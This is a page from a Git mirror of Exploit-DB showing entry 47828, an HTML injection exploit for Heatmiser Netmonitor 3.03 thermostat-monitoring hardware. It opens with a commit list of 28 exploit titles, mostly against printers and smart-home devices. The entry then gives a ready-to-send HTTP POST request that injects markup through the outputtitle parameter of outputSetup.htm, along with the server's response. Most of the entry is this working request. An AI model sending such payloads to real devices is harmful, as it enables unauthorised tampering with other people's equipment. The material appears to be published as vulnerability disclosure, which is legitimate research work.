bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/hardware/webapps/47828.txt
Offensive Security cd36764b57 DB: 2019-12-31 
28 changes to exploits/shellcodes

OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)
Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)
Microsoft UPnP - Local Privilege Elevation (Metasploit)
AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
FTP Navigator 8.03 - Stack Overflow (SEH)
Wing FTP Server 6.0.7 - Unquoted Service Path
Domain Quester Pro 6.02 - Stack Overflow (SEH)
FreeBSD-SA-19:02.fd - Privilege Escalation
FreeBSD-SA-19:15.mqueuefs - Privilege Escalation
HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
HomeAutomation 3.3.2 - Authentication Bypass
HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
HomeAutomation 3.3.2 - Remote Code Execution
elearning-script 1.0 - Authentication Bypass
XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
Thrive Smart Home 1.1 - Authentication Bypass
XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)
XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)
WEMS BEMS 21.3.1 - Undocumented Backdoor Account
AVE DOMINAplus 1.10.x - Credential Disclosure
AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot
AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)
AVE DOMINAplus 1.10.x - Authentication Bypass
Heatmiser Netmonitor 3.03 - Hardcoded Credentials
MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure
RICOH SP 4510SF Printer - HTML Injection
RICOH Web Image Monitor 1.09 - HTML Injection
Heatmiser Netmonitor 3.03 - HTML Injection
2019-12-31 05:02:03 +00:00

43 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Heatmiser Netmonitor 3.03 - HTML Injection
# Date: 2019-12-22
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.heatmiser.com/en/
# Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf
# Software: Netmonitor v3.03
# Product Version: Netmonitor v3.03
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: N/A
# Description :
# Heatmiser Net Monitor v3.03 allows HTML Injection via the
# outputSetup.htm outputtitle parameter. The HTML Injection
# vulnerability was discovered in v3.03 version of Net Monitor
# from the Heatmiser manufacturer. This vulnerability is
# vulnerable to hardware that use this software.
# HTTP Post Request :
POST /outputSetup.htm HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://XXX.XXX.XXX.XXX
Connection: close
Referer: http://TARGET/outputSetup.htm
Upgrade-Insecure-Requests: 1
outputtitle=%22%3E%3Cmarquee%3ETEST%23undefined%23undefined%23undefined%23undefined%23undefined
# HTTP Response :
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2019 20:25:22 GMT
Server: Z-World Rabbit
Connection: close
Content-Type: text/html
Reference in a new issue View git blame Copy permalink